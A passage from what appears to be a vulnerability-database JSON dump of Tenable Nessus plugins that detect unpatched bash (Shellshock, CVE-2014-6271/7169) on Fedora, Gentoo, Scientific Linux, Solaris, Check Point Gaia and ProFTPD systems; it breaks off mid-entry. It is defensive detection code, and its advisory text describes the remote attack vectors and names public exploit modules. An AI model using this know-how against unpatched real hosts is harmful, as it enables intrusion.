value:\"2022/12/05\");\n\n script_cve_id(\"CVE-2014-6271\", \"CVE-2014-7169\");\n script_bugtraq_id(70103, 70137);\n script_xref(name:\"FEDORA\", value:\"2014-11514\");\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2019-0240\");\n\n script_name(english:\"Fedora 19 : bash-4.2.48-2.fc19 (2014-11514) (Shellshock)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Fedora host 
is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"This build should fix CVE-2014-7169\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1146319\");\n # https://lists.fedoraproject.org/pipermail/package-announce/2014-September/138679.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?80775253\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected bash package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache mod_cgi Bash Environment Variable Code Injection (Shellshock)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/09/29\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:bash\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:19\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n 
script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Fedora Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 Tenable Network Security, Inc.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^19([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 19.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC19\", reference:\"bash-4.2.48-2.fc19\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bash\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-28T14:30:11", "description": "The remote host is running a version of Gaia OS which is affected by issues related to the SHELLSHOCK set of vulnerabilities in bash. 
An error exists in the bash functionality that evaluates specially formatted environment variables passed to it from another environment, which may result in remote code execution.", "cvss3": {}, "published": "2017-12-04T00:00:00", "type": "nessus", "title": "Check Point Gaia Operating Bash Code Injection (sk102673)(SHELLSHOCK)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6271", "CVE-2014-7169"], "modified": "2023-04-25T00:00:00", "cpe": ["cpe:/o:check_point:gaia_os"], "id": "CHECK_POINT_GAIA_SK102673.NASL", "href": "https://www.tenable.com/plugins/nessus/104997", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(104997);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/04/25\");\n\n script_cve_id(\"CVE-2014-6271\", \"CVE-2014-7169\");\n script_bugtraq_id(70103, 70137);\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2019-0240\");\n\n script_name(english:\"Check Point Gaia Operating Bash Code Injection (sk102673)(SHELLSHOCK)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is missing a vendor-supplied security patch.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is running a version of Gaia OS which is affected by issues\nrelated to the SHELLSHOCK set of vulnerabilities in bash. 
An error exists in the bash \nfunctionality that evaluates specially formatted environment variables passed \nto it from another environment, which may result in remote code execution.\");\n # https://supportcenter.checkpoint.com/supportcenter/portal?eventSubmit_doGoviewsolutiondetails=&solutionid=sk102673\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?c8d7a5ca\");\n # https://supportcenter.checkpoint.com/supportcenter/portal?eventSubmit_doGoviewsolutiondetails=&solutionid=sk104443&partition=General&product=Security\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?ba5b918a\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update to an unaffected version or apply vendor-supplied hotfix.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-6271\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Qmail SMTP Bash Environment Variable Injection (Shellshock)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/25\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/09/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/12/04\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n 
script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:check_point:gaia_os\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Firewalls\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"check_point_gaia_os_version.nbin\");\n script_require_keys(\"Host/Check_Point/version\", \"Host/Check_Point/installed_hotfixes\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\napp_name = \"Gaia Operating System\";\nversion = get_kb_item_or_exit(\"Host/Check_Point/version\");\nhfs = get_kb_item_or_exit(\"Host/Check_Point/installed_hotfixes\");\nvuln = FALSE;\n\nif (version =~ \"R7[01]\")\n{\n vuln = TRUE;\n fix = \"Upgrade to an unaffected version or contact Checkpoint support.\";\n}\nelse if (version =~ \"R75\\.4[0567]\" || version =~ \"R76\" || version =~ \"R77(\\.[12]0)?$\")\n{\n if(!(\"sk102673\" >< hfs && \"sk104443\" >< hfs))\n vuln = TRUE;\n fix = \"Apply Hotfix sk102673 or sk104443\";\n}\nelse\n audit(AUDIT_DEVICE_NOT_VULN, \"The remote device running \" + app_name + \" (version \" + version + \")\");\n\nif(vuln)\n{\n report =\n '\\n Installed version : ' + version +\n '\\n Fix : ' + fix +\n '\\n';\n security_report_v4(port:0, severity:SECURITY_HOLE, extra:report);\n}\nelse audit(AUDIT_DEVICE_NOT_VULN, \"The remote device running \" + app_name + \" (version \" + version + \")\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:23:42", "description": "The remote host is affected by the vulnerability described in GLSA-201409-10 (Bash: Code Injection (Updated fix for GLSA 201409-09))\n\n Stephane Chazelas reported that Bash incorrectly handles function definitions, allowing attackers to inject arbitrary code (CVE-2014-6271).\n Gentoo Linux informed about this issue in GLSA 
201409-09.\n Tavis Ormandy reported that the patch for CVE-2014-6271 was incomplete.\n As such, this GLSA supersedes GLSA 201409-09.\n Impact :\n\n A remote attacker could exploit this vulnerability to execute arbitrary commands even in restricted environments.\n Workaround :\n\n There is no known workaround at this time.", "cvss3": {}, "published": "2014-09-26T00:00:00", "type": "nessus", "title": "GLSA-201409-10 : Bash: Code Injection (Updated fix for GLSA 201409-09)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6271", "CVE-2014-7169"], "modified": "2022-01-31T00:00:00", "cpe": ["p-cpe:/a:gentoo:linux:bash", "cpe:/o:gentoo:linux"], "id": "GENTOO_GLSA-201409-10.NASL", "href": "https://www.tenable.com/plugins/nessus/77886", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 201409-10.\n#\n# The advisory text is Copyright (C) 2001-2015 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. 
See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(77886);\n script_version(\"1.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/31\");\n\n script_cve_id(\"CVE-2014-7169\");\n script_bugtraq_id(70137);\n script_xref(name:\"GLSA\", value:\"201409-10\");\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n\n script_name(english:\"GLSA-201409-10 : Bash: Code Injection (Updated fix for GLSA 201409-09)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is affected by the vulnerability described in GLSA-201409-10\n(Bash: Code Injection (Updated fix for GLSA 201409-09))\n\n Stephane Chazelas reported that Bash incorrectly handles function\n definitions, allowing attackers to inject arbitrary code (CVE-2014-6271).\n Gentoo Linux informed about this issue in GLSA 201409-09.\n Tavis Ormandy reported that the patch for CVE-2014-6271 was incomplete.\n As such, this GLSA supersedes GLSA 201409-09.\n \nImpact :\n\n A remote attacker could exploit this vulnerability to execute arbitrary\n commands even in restricted environments.\n \nWorkaround :\n\n There is no known workaround at this time.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://security.gentoo.org/glsa/201409-10\");\n script_set_attribute(attribute:\"solution\", value:\n\"All Bash 3.1 users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=app-shells/bash-3.1_p18-r1:3.1'\n All Bash 3.2 users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=app-shells/bash-3.2_p52-r1:3.2'\n All Bash 4.0 users should upgrade to the latest version:\n # emerge 
--sync\n # emerge --ask --oneshot --verbose '>=app-shells/bash-4.0_p39-r1:4.0'\n All Bash 4.1 users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=app-shells/bash-4.1_p12-r1:4.1'\n All Bash 4.2 users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=app-shells/bash-4.2_p48-r1'\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/09/26\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:bash\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 Tenable Network Security, Inc.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"app-shells/bash\", unaffected:make_list(\"rge 3.1_p18-r1\", \"rge 3.2_p52-r1\", 
\"rge 4.0_p39-r1\", \"rge 4.1_p12-r1\", \"ge 4.2_p48-r1\"), vulnerable:make_list(\"lt 4.2_p48-r1\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"Bash\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-06-04T14:50:15", "description": "It was found that the fix for CVE-2014-6271 was incomplete, and Bash still allowed certain characters to be injected into other environments via specially crafted environment variables. An attacker could potentially use this flaw to override or bypass environment restrictions to execute shell commands. Certain services and applications allow remote unauthenticated attackers to provide environment variables, allowing them to exploit this issue.\n(CVE-2014-7169)\n\nApplications which directly create bash functions as environment variables need to be made aware of changes to the way names are handled by this update.\n\nNote: Docker users are advised to use 'yum update' within their containers, and to commit the resulting changes.\n\nFor additional information on CVE-2014-6271 and CVE-2014-7169, refer to https://securityblog.redhat.com/2014/09/24/bash-specially-crafted-environment-variables-code-injection-attack/", "cvss3": {}, "published": "2014-09-29T00:00:00", "type": "nessus", "title": "Scientific Linux Security Update : bash on SL5.x, SL6.x i386/x86_64 (20140926) (Shellshock)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6271", "CVE-2014-7169"], "modified": "2022-12-05T00:00:00", "cpe": ["p-cpe:/a:fermilab:scientific_linux:bash", "p-cpe:/a:fermilab:scientific_linux:bash-debuginfo", "p-cpe:/a:fermilab:scientific_linux:bash-doc", "x-cpe:/o:fermilab:scientific_linux"], "id": "SL_20140926_BASH_ON_SL5_X.NASL", "href": "https://www.tenable.com/plugins/nessus/77956", 
"sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text is (C) Scientific Linux.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(77956);\n script_version(\"1.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\"CVE-2014-6271\", \"CVE-2014-7169\");\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2019-0240\");\n\n script_name(english:\"Scientific Linux Security Update : bash on SL5.x, SL6.x i386/x86_64 (20140926) (Shellshock)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Scientific Linux host is missing one or more security\nupdates.\");\n script_set_attribute(attribute:\"description\", value:\n\"It was found that the fix for CVE-2014-6271 was incomplete, and Bash\nstill allowed certain characters to be injected into other\nenvironments via specially crafted environment variables. An attacker\ncould potentially use this flaw to override or bypass environment\nrestrictions to execute shell commands. 
Certain services and\napplications allow remote unauthenticated attackers to provide\nenvironment variables, allowing them to exploit this issue.\n(CVE-2014-7169)\n\nApplications which directly create bash functions as environment\nvariables need to be made aware of changes to the way names are\nhandled by this update.\n\nNote: Docker users are advised to use 'yum update' within their\ncontainers, and to commit the resulting changes.\n\nFor additional information on CVE-2014-6271 and CVE-2014-7169, refer\nto https://securityblog.redhat.com/2014/09/24/bash-specially\ncrafted-environment-variables-code-injection-attack/\");\n # https://listserv.fnal.gov/scripts/wa.exe?A2=ind1409&L=scientific-linux-errata&T=0&P=1987\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?f7d56c5e\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected bash, bash-debuginfo and / or bash-doc packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache mod_cgi Bash Environment Variable Code Injection (Shellshock)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/09/29\");\n\n 
script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:bash\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:bash-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:bash-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:fermilab:scientific_linux\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nos_ver = pregmatch(pattern: \"Scientific Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Scientific Linux\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Scientific Linux 6.x\", \"Scientific Linux \" + os_ver);\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL5\", reference:\"bash-3.2-33.el5_11.4\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"bash-debuginfo-3.2-33.el5_11.4\")) flag++;\n\nif (rpm_check(release:\"SL6\", reference:\"bash-4.1.2-15.el6_5.2\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"bash-debuginfo-4.1.2-15.el6_5.2\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"bash-doc-4.1.2-15.el6_5.2\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bash / bash-debuginfo / bash-doc\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-06-02T14:13:27", "description": "SunOS 5.10: bash patch. 
\n\nDate this patch was last updated by Oracle : Sep/26/14", "cvss3": {}, "published": "2014-09-26T00:00:00", "type": "nessus", "title": "Solaris 10 (sparc) : 126546-06", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6271", "CVE-2014-7169"], "modified": "2022-12-05T00:00:00", "cpe": ["cpe:/o:sun:solaris"], "id": "SOLARIS10_126546-06.NASL", "href": "https://www.tenable.com/plugins/nessus/77913", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\n#\n# The descriptive text in this plugin was\n# extracted from the Oracle SunOS Patch Updates.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(77913);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\"CVE-2014-6271\", \"CVE-2014-7169\");\n script_bugtraq_id(70103, 70137);\n script_xref(name:\"CERT\", value:\"252743\");\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n script_xref(name:\"EDB-ID\", value:\"34765\");\n script_xref(name:\"EDB-ID\", value:\"34766\");\n script_xref(name:\"EDB-ID\", value:\"34777\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2019-0240\");\n\n script_name(english:\"Solaris 10 (sparc) : 126546-06\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is missing Oracle Security Patch number 126546-06\");\n script_set_attribute(attribute:\"description\", value:\n\"SunOS 5.10: bash patch. 
\n\nDate this patch was last updated by Oracle : Sep/26/14\");\n script_set_attribute(attribute:\"see_also\", value:\"http://seclists.org/oss-sec/2014/q3/650\");\n # https://securityblog.redhat.com/2014/09/24/bash-specially-crafted-environment-variables-code-injection-attack/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?dacf7829\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.invisiblethreat.ca/2014/09/cve-2014-6271/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://blogs.oracle.com/patch/entry/solaris_idrs_available_on_mos\");\n script_set_attribute(attribute:\"see_also\", value:\"https://getupdates.oracle.com/readme/126546-06\");\n script_set_attribute(attribute:\"solution\", value:\n\"You should install this patch for your system to be up-to-date.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache mod_cgi Bash Environment Variable Code Injection (Shellshock)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/09/26\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:sun:solaris\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n 
script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Solaris Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 Tenable Network Security, Inc.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Solaris/showrev\", \"Host/Solaris/pkginfo\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"solaris.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Solaris/showrev\")) audit(AUDIT_OS_NOT, \"Solaris 10 or earlier\");\nif (!get_kb_item(\"Host/Solaris/pkginfo\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"126546-06\", obsoleted_by:\"\", package:\"SUNWbash\", version:\"11.10.0,REV=2005.01.08.05.16\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"126546-06\", obsoleted_by:\"\", package:\"SUNWbashS\", version:\"11.10.0,REV=2005.01.08.05.16\") < 0) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:solaris_get_report());\n else security_hole(0);\n exit(0);\n}\naudit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-28T14:22:10", "description": "The remote FTP server is affected by a remote code execution vulnerability due to an error in the Bash shell running on the remote host. A remote, unauthenticated attacker can execute arbitrary code on the remote host by sending a specially crafted request via the USER FTP command. 
The 'mod_exec' module exports the attacker-supplied username as an environment variable, which is then evaluated by Bash as code.", "cvss3": {}, "published": "2014-09-30T00:00:00", "type": "nessus", "title": "GNU Bash Environment Variable Handling Code Injection via ProFTPD (Shellshock)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6271", "CVE-2014-7169"], "modified": "2023-04-25T00:00:00", "cpe": ["cpe:/a:gnu:bash", "cpe:/a:proftpd:proftpd"], "id": "PROFTPD_BASH_INJECTION.NASL", "href": "https://www.tenable.com/plugins/nessus/77986", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(77986);\n script_version(\"1.28\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/04/25\");\n\n script_cve_id(\"CVE-2014-6271\", \"CVE-2014-7169\");\n script_bugtraq_id(70103, 
70137);\n script_xref(name:\"CERT\", value:\"252743\");\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n script_xref(name:\"EDB-ID\", value:\"34765\");\n script_xref(name:\"EDB-ID\", value:\"34766\");\n script_xref(name:\"EDB-ID\", value:\"34777\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2019-0240\");\n\n script_name(english:\"GNU Bash Environment Variable Handling Code Injection via ProFTPD (Shellshock)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote FTP server is affected by a remote code execution\nvulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote FTP server is affected by a remote code execution\nvulnerability due to an error in the Bash shell running on the remote\nhost. A remote, unauthenticated attacker can execute arbitrary code on\nthe remote host by sending a specially crafted request via the USER\nFTP command. The 'mod_exec' module exports the attacker-supplied\nusername 